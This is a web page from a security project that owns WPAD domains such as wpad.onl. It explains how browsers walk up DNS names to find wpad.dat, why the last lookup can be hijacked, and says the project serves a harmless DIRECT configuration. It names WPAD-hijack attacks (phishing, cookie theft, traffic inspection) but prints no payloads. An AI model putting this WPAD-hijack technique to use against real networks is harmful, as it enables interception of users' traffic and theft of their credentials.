The project that keeps you safe on the internet, without you knowing it!
The Web Proxy Auto-Discovery (WPAD) Protocol is a method used by clients to locate the URL of a configuration file using DHCP and/or DNS discovery methods. Once detection and download of the configuration file is complete, it can be executed to determine the proxy for a specified URL.
Before fetching its first page, a web browser implementing this method sends a DHCPINFORM query to the local DHCP server, and uses the URL from the WPAD option in the server's reply. If the DHCP server does not provide the desired information, DNS is used. If, for example, the network name of the user's computer is laptop1.department.branch.example.onl, the browser will try the following URLs in turn until it finds a proxy configuration file within the domain of the client:
- Try
http://wpad.department.branch.company.onl/wpad.dat - Try
http://wpad.branch.company.onl/wpad.dat - Try
http://wpad.company.onl/wpad.dat - Try
http://wpad.onl/wpad.dat
As you can see, the last check poses a major security risk. As anyone can potentially own the wpad.onl domain!
I used that example as THUGSred own wpad.onl
Checkout the wpad.dat file content here
The security risk ?
The main security risk is that some threat-actor will be in control of your "automatic proxy detection" wpad.dat settings.
And can potentially tell your computer/software to use a proxy-server in the threat-actors control all without you ever knowing it!
The possibilities from there is almost endless and protentially very bad.
I have listed here a few threats and attacks that could be applied to your proxy traffic:
- Website spoofing (Phishing)
- Stealing sessions/cookies
- Stealing form fields
- Traffic inspection (HTTP/HTTPS)
- Malicious payloads/downloads
What we do ...
Whenever your computer/software makes the mistake and tries to grab the "automatic proxy detection" wpad.dat file.
No matter what TLD domain, as long as it's one that we are in control of.
Then we make sure to send your computer/software back a clean wpad.dat file. That means we are telling it to do no proxying.
(Simply put, we are sending back a DIRECT command)
In the future, we might test out sending it to a local proxy, in order for us to collect more security research statistical data. Like what website hostname/domain you where trying to visit. But this is for now not live. This would also require us to then "interrupt" all your traffic by relaying back an "error" saying - Hey you can't view this page. This is most likely not well received by most and also could potentially disrupt systems/software functionality.
Checkout the wpad.dat file content here